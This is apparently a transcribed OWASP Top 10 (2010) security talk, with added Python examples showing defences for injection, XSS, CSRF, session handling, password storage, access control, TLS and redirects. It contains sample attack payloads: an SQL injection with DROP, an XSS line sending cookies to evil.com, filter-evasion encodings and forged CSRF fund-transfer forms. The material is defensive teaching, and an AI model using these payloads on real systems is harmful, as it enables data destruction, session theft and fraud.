Per Josefsson, OWASP Top Ten, 20110825

OWASP Top 10 - Agenda

Background
Risk based
Top 10 items 1 – 6
Live demo
Top 10 items 7 – 10
OWASP resources




                        OWASP
The OWASP Guide




Risk rating factors used for each Top 10 item:

Threat Agent   Attack Vector   Weakness Prevalence   Weakness Detectability   Technical Impact   Business Impact
     ?         Easy            Widespread            Easy                     Severe                  ?
     ?         Average         Common                Average                  Moderate                ?
     ?         Difficult       Uncommon              Difficult                Minor                   ?

(? = application/business specific; the Top 10 does not rate these two columns for you)




Warning

Risk analysis
  Insiders
Architecture
  Modular
  Clarity
SDLC
  Knowledge
  Predictability




Top 10 - 2010

1. Injection
2. Cross site scripting (XSS)
3. Broken authentication and session management
4. Insecure direct object reference
5. Cross site request forgery (CSRF)
6. Security misconfiguration
7. Insecure cryptographic storage
8. Failure to restrict URL access
9. Insufficient transport layer protection
10. Unvalidated redirects and forwards

A1 – Injection

[Figure: Client -> Appl -> DB / Shell / Pgm -> CPU: the interpreters behind the application that untrusted input can reach]





A1 – Injection

String query = "SELECT * FROM accnts WHERE ID='" + request.getParameter("id") + "'";

Normal input:
id="foo"
SELECT * FROM accnts WHERE ID='foo';

Malicious input (a closing quote followed by a second statement):
id="foo';DROP accnts;--"
SELECT * FROM accnts WHERE ID='foo';DROP accnts;--';
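The slide shows the vulnerable Java pattern; the fix is to let the database driver bind the value. The following is an added Python/sqlite3 example (not code from the slides, and not the servlet code above) that builds the same SQL text the slide does, but never executes it, and beside it runs the parameterised form of the query. The `accnts` table contents and the in-memory database are constructed for the example.

```python
import sqlite3

# Constructed sample data standing in for the slide's "accnts" table.
SAMPLE_ROWS = [("foo", "Alice"), ("bar", "Bob")]


def make_db() -> sqlite3.Connection:
    """Create an in-memory accnts table filled with the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accnts (ID TEXT PRIMARY KEY, owner TEXT)")
    conn.executemany("INSERT INTO accnts VALUES (?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def build_query_unsafe(account_id: str) -> str:
    """The slide's pattern: the request parameter is pasted into the SQL text.

    Returns the string only; it is deliberately never executed here. With the
    slide's payload the result contains a second statement, i.e. the attacker
    has changed the *structure* of the query, not merely a value in it."""
    return "SELECT * FROM accnts WHERE ID='" + account_id + "'"


def lookup_safe(conn: sqlite3.Connection, account_id: str) -> list:
    """Parameterised query: the SQL structure is fixed before any user data is
    seen, and the driver passes account_id to the engine as a plain value."""
    cur = conn.execute("SELECT * FROM accnts WHERE ID = ?", (account_id,))
    return cur.fetchall()


def row_count(conn: sqlite3.Connection) -> int:
    """Rows still present in accnts (shows that nothing was dropped)."""
    return conn.execute("SELECT COUNT(*) FROM accnts").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    payload = "foo';DROP accnts;--"          # the slide's malicious input
    print("Unsafe SQL text :", build_query_unsafe(payload))
    print("Safe lookup     :", lookup_safe(db, payload))   # [] - treated as a literal ID
    print("Rows remaining  :", row_count(db))              # 2
```

With the parameterised form the payload simply fails to match any account; the text `DROP accnts` never reaches the SQL parser as a statement.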


A2 - Cross site scripting (XSS)

[Figure: Browser -> Appl <-> DB -> Browser: script supplied through one browser is served by the application to another]




A2 - Cross site scripting (XSS)

(String) page += "<input name='cc' type='TEXT' value='" + request.getParameter("CC") + "'>";

Normal input:
CC="123456789"
<input name='cc' value='123456789'>

Malicious input (a closing quote followed by a script tag):
CC=123456789"><script>window.location=http://evil.com?x=document.cookie</script>
<input name='cc' value='123456789"><script>window.location=http://evil.com?x=document.cookie</script>'>
A2 - Cross site scripting (XSS)

Example attack vectors:
  <img src=http://site.com onmouseover=...
  <body onload=...
  <IMG SRC=j&#X41vascript:alert('test2')>

Ways of writing "<" that a filter must recognise (all decode to the same character):
  <            &#x003c        &#60
  %3C          &#X3c          &#060
  &lt          &#x3C          &#60;
  &lt;         &#x000003C;    \x3c
  &LT                         \x3C
  &LT;                        \u003c
                              \u003C
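Two points from the A2 slides belong together: output must be encoded for the context it lands in, and any filter that looks for a literal `<` is defeated by the spellings in the table above. The following is an added Python example (not code from the slides) that renders the slide's `<input>` both the vulnerable way and with `html.escape`, and canonicalises the table's encodings to show that every one of them is the same character. The `LT_VARIANTS` list is constructed from the table; the function names are the example's own.

```python
import html
from urllib.parse import unquote


def render_input_unsafe(cc: str) -> str:
    """The slide's pattern: the CC parameter is pasted into the HTML as-is,
    so a quote in the input ends the attribute and the rest becomes markup."""
    return "<input name='cc' type='TEXT' value='" + cc + "'>"


def render_input_safe(cc: str) -> str:
    """Output encoding for an attribute context: html.escape(quote=True)
    turns & < > " ' into entities, so the browser shows them as text."""
    return "<input name='cc' type='TEXT' value='" + html.escape(cc, quote=True) + "'>"


def canonicalize(s: str) -> str:
    """Reduce the encodings in the slide's table to the plain character:
    URL %XX, HTML named/decimal/hex entities (with or without ';') and
    JavaScript \\xNN / \\uNNNN escapes. Repeats until no layer changes anything,
    which also covers double-encoded input."""
    prev = None
    while s != prev:
        prev = s
        s = html.unescape(unquote(s))
        if "\\" in s:
            # backslash escapes are a JavaScript-string layer, not HTML
            s = s.encode("utf-8").decode("unicode_escape")
    return s


def naive_filter_blocks(s: str) -> bool:
    """A filter that only looks for a literal '<' (what the table argues against)."""
    return "<" in s


def encodings_missed_by_naive_filter(variants) -> list:
    """Every spelling that is really '<' but the literal filter lets through."""
    return [v for v in variants if canonicalize(v) == "<" and not naive_filter_blocks(v)]


# The spellings of "<" from the slide's table (constructed list, same values).
LT_VARIANTS = [
    "<", "%3C", "&lt", "&lt;", "&LT", "&LT;", "&#60", "&#060", "&#60;",
    "&#x003c", "&#X3c", "&#x3C", "&#x000003C;",
    "\\x3c", "\\x3C", "\\u003c", "\\u003C",
]

if __name__ == "__main__":
    payload = '123456789"><script>'            # prefix of the slide's malicious CC value
    print(render_input_unsafe(payload))
    print(render_input_safe(payload))
    print("missed by literal filter:", encodings_missed_by_naive_filter(LT_VARIANTS))
```

The lesson the numbers show: of the 17 spellings, the literal filter catches exactly one, whereas encoding on output makes the question of input spelling irrelevant.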




A3 - Broken authentication and session management

Unpredictable passwords, session IDs and security questions
No session IDs or credentials in URLs
Avoid session fixation
Session timeouts and logout buttons
Different session IDs outside and inside TLS
No cleartext passwords
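The bullets above describe properties of a session store; the following added Python example (not code from the slides) implements the three that can be shown in a few dozen lines: unpredictable IDs from a CSPRNG, a fresh ID issued at login so a pre-planted ID never becomes authenticated (session fixation), and an idle timeout plus server-side logout. The timeout value and the injectable clock are the example's own choices.

```python
import secrets
import time
from dataclasses import dataclass
from typing import Callable, Dict, Optional

IDLE_TIMEOUT = 15 * 60  # seconds of inactivity before a session is dropped (constructed policy)


@dataclass
class Session:
    user: Optional[str] = None   # None until the user has logged in
    last_seen: float = 0.0


class SessionStore:
    """Server-side session table. IDs come from the secrets module (CSPRNG),
    so they cannot be guessed or enumerated; they are meant to travel in a
    cookie, never in a URL. The clock is injectable so timeouts are testable."""

    def __init__(self, clock: Callable[[], float] = time.time) -> None:
        self._sessions: Dict[str, Session] = {}
        self._clock = clock

    @staticmethod
    def _new_id() -> str:
        return secrets.token_urlsafe(32)  # 256 bits of randomness, 43 characters

    def create(self) -> str:
        """Start an anonymous (pre-login) session and return its ID."""
        sid = self._new_id()
        self._sessions[sid] = Session(last_seen=self._clock())
        return sid

    def get(self, sid: str) -> Optional[Session]:
        """Resolve an ID; idle sessions are expired here (slide: 'time out')."""
        sess = self._sessions.get(sid)
        if sess is None:
            return None
        now = self._clock()
        if now - sess.last_seen > IDLE_TIMEOUT:
            del self._sessions[sid]
            return None
        sess.last_seen = now
        return sess

    def login(self, sid: Optional[str], user: str) -> str:
        """Bind the user to a *fresh* ID and discard the pre-login one. An ID
        that an attacker planted before login (session fixation) therefore
        never turns into an authenticated session."""
        if sid is not None:
            self._sessions.pop(sid, None)
        new_sid = self._new_id()
        self._sessions[new_sid] = Session(user=user, last_seen=self._clock())
        return new_sid

    def logout(self, sid: str) -> None:
        """Invalidate server-side, so a copied cookie is useless afterwards."""
        self._sessions.pop(sid, None)


if __name__ == "__main__":
    store = SessionStore()
    anon = store.create()
    authed = store.login(anon, "alice")      # constructed user
    print("pre-login id still valid?", store.get(anon) is not None)
    print("post-login user:", store.get(authed).user)
```

The "different session IDs outside and inside TLS" bullet is the same rotation applied once more at the plain-HTTP to HTTPS boundary: call `login`-style re-issuance there too, so an ID that was ever sent in the clear never identifies the TLS-protected session.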
A4 - Insecure direct object references

The form offers only two values:

<SELECT name=period>
   <OPTION>2010q1</OPTION>
   <OPTION>2011q2</OPTION>
</SELECT>

Expected request:
period=2011q2

Tampered request, asking for a period the form never offered:
period=2011q3



A5 - Cross-site request forgery (CSRF)

Forged GET request hidden in an invisible image:

<img src="http://example.com/transferFunds?amount=1500&destinationAccount=attackersAcct#" width="0" height="0" />

Forged POST request submitted automatically when the attacker's page loads:

<body onload="document.forms[0].submit()">
<form method="POST" action="https://bank.com/fn">
   <input type="hidden" name="sp" value="8109"/>
</form>
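Both forged requests on the slide succeed only because the bank's endpoint accepts a request that carries nothing the attacker's page could not supply. The following added Python example (not code from the slides) shows the `/fn` endpoint hardened with a synchronizer token: state changes are accepted only via POST and only when the form carries a token bound to the victim's session. Deriving the token as an HMAC of the session ID under a server secret is this example's design choice; the session ID and form contents are constructed.

```python
import hashlib
import hmac
import secrets
from typing import Dict, Optional


class CsrfProtector:
    """Synchronizer-token pattern. The token is HMAC(server_secret, session_id),
    so it is bound to one session, cannot be computed by the attacker's page,
    and needs no extra server-side storage."""

    def __init__(self, server_secret: Optional[bytes] = None) -> None:
        self._secret = server_secret or secrets.token_bytes(32)

    def token_for(self, session_id: str) -> str:
        """Embed this in the genuine form as <input type="hidden" name="csrf_token">."""
        return hmac.new(self._secret, session_id.encode(), hashlib.sha256).hexdigest()

    def is_valid(self, session_id: str, submitted: Optional[str]) -> bool:
        if not submitted:
            return False
        # constant-time comparison of the expected and submitted tokens
        return hmac.compare_digest(self.token_for(session_id), submitted)


def handle_fn(protector: CsrfProtector, method: str, session_id: str, form: Dict[str, str]) -> str:
    """The bank's /fn endpoint from the slide, hardened."""
    if method != "POST":
        # the <img src=...transferFunds...> trick relies on GET having side effects
        return "405 Method Not Allowed"
    if not protector.is_valid(session_id, form.get("csrf_token")):
        # the auto-submitting <form> on the attacker's page carries no token
        return "403 Forbidden: missing or invalid CSRF token"
    return "200 OK: processed sp=" + form.get("sp", "")


if __name__ == "__main__":
    p = CsrfProtector()
    victim_session = "session-of-victim"            # constructed session ID
    forged = {"sp": "8109"}                          # the slide's hidden form, no token
    print(handle_fn(p, "POST", victim_session, forged))
    genuine = {"sp": "8109", "csrf_token": p.token_for(victim_session)}
    print(handle_fn(p, "POST", victim_session, genuine))
```

Note that the check is per session, so a token the attacker obtains for their own session does not validate against the victim's.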



A6 - Security misconfiguration




Patching
  OS
  Application
  Frameworks / libraries
Disable unnecessary services
Stack traces
Configuration

A7 - Insecure cryptographic storage

Keep track of sensitive data
Passwords one-way hashed and salted
Password/key management
  TLS key passphrase
  M2M passwords (obfuscation)
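"One-way hashed and salted" is easy to state and easy to get wrong, so here is an added Python example (not code from the slides) that shows both the anti-pattern and a correct stored format. The slide names no algorithm; PBKDF2-HMAC-SHA256 is this example's choice because it is in the standard library, and the iteration count and the `algo$iters$salt$digest` layout are the example's own.

```python
import base64
import hashlib
import hmac
import os

ITERATIONS = 600_000   # constructed default; tune so one hash costs ~0.1-0.3 s on your hardware


def unsalted_hash(password: str) -> str:
    """What NOT to do: two users with the same password get the same digest,
    so one precomputed table cracks every account at once."""
    return hashlib.sha256(password.encode()).hexdigest()


def _b64(raw: bytes) -> str:
    return base64.b64encode(raw).decode()


def hash_password(password: str, iterations: int = ITERATIONS) -> str:
    """One-way, per-user salted, deliberately slow. The salt is fresh random
    bytes, stored next to the digest so the check can be repeated later."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${_b64(salt)}${_b64(digest)}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and iteration count; compare in constant time."""
    try:
        algo, iters, salt_b64, digest_b64 = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    salt = base64.b64decode(salt_b64)
    expected = base64.b64decode(digest_b64)
    actual = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    return hmac.compare_digest(actual, expected)


if __name__ == "__main__":
    pw = "correct horse"                          # constructed password
    print("unsalted, identical twice:", unsalted_hash(pw) == unsalted_hash(pw))
    h1, h2 = hash_password(pw), hash_password(pw)
    print("salted, differs each time:", h1 != h2)
    print("both verify:", verify_password(pw, h1) and verify_password(pw, h2))
```

Because the iteration count is part of the stored string, it can be raised for new passwords without invalidating old records; old ones are simply re-hashed at the user's next successful login.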




A8 - Failure to restrict URL access

Same function, two URLs; the admin one must be protected by a server-side access check, not merely left out of the menu:

/user/getAccounts
/admin/getAccounts
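A4 (the `period` the form never offered) and A8 (the admin URL that is merely not linked) are the same mistake at two levels: trusting what the client was shown instead of checking what the server permits. The following added Python example (not code from the slides) serves both slides with one handler that first checks the URL against a role (deny by default) and then checks the requested period against what exists and what the user may read. The users, roles and route table are constructed.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet


@dataclass(frozen=True)
class User:
    name: str
    roles: FrozenSet[str]
    periods: FrozenSet[str]   # reporting periods this user is entitled to read


class Forbidden(Exception):
    """Raised when either the URL or the requested object is not allowed."""


# Constructed policy data. Deny-by-default: a URL not listed here is refused.
ROUTE_ROLES: Dict[str, str] = {
    "/user/getAccounts": "user",     # URL from the A8 slide
    "/admin/getAccounts": "admin",   # URL from the A8 slide
}
# Periods that exist at all; the <SELECT> on the A4 slide offered only these two.
PUBLISHED_PERIODS: FrozenSet[str] = frozenset({"2010q1", "2011q2"})


def authorize_url(user: User, path: str) -> None:
    """A8: the admin URL is protected by a server-side role check,
    not by leaving it out of the menu."""
    required = ROUTE_ROLES.get(path)
    if required is None or required not in user.roles:
        raise Forbidden(f"{user.name} may not call {path}")


def authorize_period(user: User, period: str) -> None:
    """A4: the server re-validates the object reference instead of trusting
    that the client picked it from the <SELECT> it was given."""
    if period not in PUBLISHED_PERIODS or period not in user.periods:
        raise Forbidden(f"{user.name} may not read period {period}")


def get_accounts(user: User, path: str, period: str) -> str:
    """Handler behind both URLs on the slide: check the function, then the object."""
    authorize_url(user, path)
    authorize_period(user, period)
    return f"accounts for {period} (via {path})"


def is_allowed(user: User, path: str, period: str) -> bool:
    """Yes/no wrapper around the two checks."""
    try:
        get_accounts(user, path, period)
        return True
    except Forbidden:
        return False


# Constructed users
ALICE = User("alice", frozenset({"user"}), frozenset({"2010q1", "2011q2"}))
BOB = User("bob", frozenset({"user", "admin"}), frozenset({"2010q1", "2011q2"}))

if __name__ == "__main__":
    print(is_allowed(ALICE, "/user/getAccounts", "2011q2"))    # the slide's expected request
    print(is_allowed(ALICE, "/user/getAccounts", "2011q3"))    # the tampered period
    print(is_allowed(ALICE, "/admin/getAccounts", "2011q2"))   # the unlinked admin URL
```

The important property is that both checks run on every request, regardless of how the client arrived at the URL or the period value.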




A9 - Insufficient transport layer protection

Use SSL/TLS
No mixed content
Use secure cookies

Example: Firesheep exploits poor solutions
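The three bullets are checkable properties of a response, so here is an added Python example (not code from the slides) that builds a session cookie with the Secure and HttpOnly flags, audits a `Set-Cookie` value for a missing Secure flag, emits an HSTS header, and scans HTML for plain-`http://` subresources (mixed content). The cookie name, the HSTS lifetime and the sample HTML are constructed.

```python
import re
from http.cookies import SimpleCookie
from typing import Dict, List


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value for a session cookie: Secure keeps it off plain-HTTP
    connections (the Firesheep scenario), HttpOnly keeps it away from script."""
    jar = SimpleCookie()
    jar["SESSIONID"] = session_id          # constructed cookie name
    jar["SESSIONID"]["path"] = "/"
    jar["SESSIONID"]["secure"] = True
    jar["SESSIONID"]["httponly"] = True
    return jar["SESSIONID"].OutputString()


def audit_set_cookie(header_value: str) -> List[str]:
    """Names of cookies in a Set-Cookie value that lack the Secure flag."""
    jar = SimpleCookie()
    jar.load(header_value)
    return [name for name, morsel in jar.items() if not morsel["secure"]]


def tls_response_headers() -> Dict[str, str]:
    """Headers a TLS-only site should send: HSTS tells the browser to use
    https for this host for the stated lifetime (one year here, constructed)."""
    return {"Strict-Transport-Security": "max-age=31536000; includeSubDomains"}


# src= / href= attributes whose value starts with plain http://
_PLAIN_HTTP_REF = re.compile(r'''(?:src|href)\s*=\s*["']?(http://[^"'\s>]+)''', re.IGNORECASE)


def find_mixed_content(page_html: str) -> List[str]:
    """URLs loaded over plain http:// from a page served over https
    (the slide's 'no mixed content' rule)."""
    return _PLAIN_HTTP_REF.findall(page_html)


if __name__ == "__main__":
    hdr = session_cookie_header("abc123")
    print(hdr)
    print("insecure cookies:", audit_set_cookie("SESSIONID=abc123; Path=/"))
    sample = ('<script src="http://cdn.example/app.js"></script>'
              '<img src="https://img.example/a.png">')       # constructed HTML
    print("mixed content:", find_mixed_content(sample))
```

Without the Secure flag the browser attaches the session cookie to any `http://` request for the same host, which is exactly what a passive sniffer on shared Wi-Fi needs.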



A10 - Unvalidated redirects and forwards

http://www.vuln.com/redir.asp?=http://www.links.com

http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D
(percent-encoded form of http://www.google.com, so the real destination is not obvious in the link)
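The two URLs above make the same point twice: the redirect target is attacker-controlled, and encoding can hide where it really goes. The following added Python example (not code from the slides) validates a redirect parameter the way `redir.asp` should: decode fully first, then accept only a local path or an absolute URL on our own host, falling back to a default page otherwise. `www.vuln.com` is taken from the slide as "our" host; the function names are the example's own.

```python
from typing import Optional
from urllib.parse import unquote, urlsplit

SITE_HOST = "www.vuln.com"   # the host from the slide, standing in for our own site


def decode_fully(url: str) -> str:
    """Percent-decode until nothing changes, so a hostname hidden behind %XX
    (or double-encoded) is seen for what it is before any decision is made."""
    prev = None
    while url != prev:
        prev, url = url, unquote(url)
    return url


def resolve_redirect(raw_target: Optional[str], site_host: str = SITE_HOST, default: str = "/") -> str:
    """Return a redirect target that stays on our site, or `default`.

    Accepted: a relative path starting with a single '/', or an absolute
    http(s) URL whose host is exactly ours. Everything else (other hosts,
    scheme-relative '//host', other schemes) falls back to the default page."""
    if not raw_target:
        return default
    target = decode_fully(raw_target.strip())
    parts = urlsplit(target)
    if parts.scheme or parts.netloc:
        if parts.scheme.lower() not in ("http", "https"):
            return default
        # hostname (not netloc) strips userinfo and port before the comparison
        if (parts.hostname or "").lower() != site_host.lower():
            return default
    path = parts.path or "/"
    if not path.startswith("/") or path.startswith("//") or path.startswith("/\\"):
        return default
    return path + ("?" + parts.query if parts.query else "")


if __name__ == "__main__":
    for candidate in ("http://www.links.com",                                   # slide, first URL
                      "http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D",     # slide, second URL
                      "/account/summary",                                       # constructed local path
                      "http://www.vuln.com/home?tab=1"):                        # constructed same-host URL
        print(f"{candidate!r:60} -> {resolve_redirect(candidate)!r}")
```

Decoding before validating is the step that matters for the second URL: compared as raw text it contains no recognisable foreign hostname, but after decoding it is plainly `www.google.com`.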




OWASP resources

OWASP Secure Software Contract Annex
OWASP Developer’s Guide
OWASP Enterprise Security API (ESAPI)
OWASP Software Assurance Maturity Model (SAMM)
OWASP WebGoat



